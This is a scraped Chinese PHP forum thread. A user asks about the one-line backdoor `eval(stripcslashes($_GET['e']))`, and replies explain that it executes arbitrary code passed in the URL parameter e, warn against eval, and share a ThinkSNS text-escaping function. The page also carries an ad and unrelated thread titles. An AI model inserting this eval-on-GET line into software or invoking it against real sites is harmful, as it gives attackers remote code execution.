一个很严重的代码 <? eval(stripcslashes($_GET['e']));?> 这句代码到底有什么害处 还有怎样使用这句代码 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 可以执行很多代码....害处要看代码是什么代码.传递一个 e=xxxxxxx 必要的地方加反斜杠 浏览器地址后加个参数http://www.abc.com?e=...后面可以加任何函数或字串e=phpinfo() 这都是最常见的php漏洞,建议你看看这个。http://www.2cto.com/Article/200911/43018.html eval 不要乱用,其实是最好不要用。 /** * 转换为安全的纯文本 * * @param string $text * @param boolean $parse_br 是否转换换行符 * @param int $quote_style ENT_NOQUOTES:(默认)不过滤单引号和双引号 ENT_QUOTES:过滤单引号和双引号 ENT_COMPAT:过滤双引号,而不过滤单引号 * @return string|null string:被转换的字符串 null:参数错误 */function t($text, $parse_br = false, $quote_style = ENT_NOQUOTES){ if (is_numeric($text)) $text = (string)$text; if (!is_string($text)) return null; if (!$parse_br) { $text = str_replace(array("\r","\n","\t"), ' ', $text); } else { $text = nl2br($text); } //$text = stripslashes($text); $text = htmlspecialchars($text, $quote_style, 'UTF-8'); return $text;} thinksns过滤的 关于php的底层实现 php利用exec调用自己写的sh脚本,使用360或ie浏览器执行不完? 验证图片出不来请求助 用.net改成一段PHP代码,高手请进 关于PHP模板标签的转换 想问一下大家是如何做的. 请问:Pear导出Excel, 如何在Spreadsheet_Exce l_Writer中添加中文的工作表? 执行MYSQL语句出错!不明白? 2k系统中也会出现这样的问题,怪! 早上好,在线的朋友来看看?? 关于artdialog 插件的问题 为什么POST过来的sha1加密字符串相等的判断不对呢。
传递一个 e=xxxxxxx 必要的地方加反斜杠
后面可以加任何函数或字串e=phpinfo()
http://www.2cto.com/Article/200911/43018.html
* 转换为安全的纯文本
*
* @param string $text
* @param boolean $parse_br 是否转换换行符
* @param int $quote_style ENT_NOQUOTES:(默认)不过滤单引号和双引号 ENT_QUOTES:过滤单引号和双引号 ENT_COMPAT:过滤双引号,而不过滤单引号
* @return string|null string:被转换的字符串 null:参数错误
*/
function t($text, $parse_br = false, $quote_style = ENT_NOQUOTES)
{
if (is_numeric($text))
$text = (string)$text; if (!is_string($text))
return null; if (!$parse_br) {
$text = str_replace(array("\r","\n","\t"), ' ', $text);
} else {
$text = nl2br($text);
} //$text = stripslashes($text);
$text = htmlspecialchars($text, $quote_style, 'UTF-8'); return $text;
} thinksns过滤的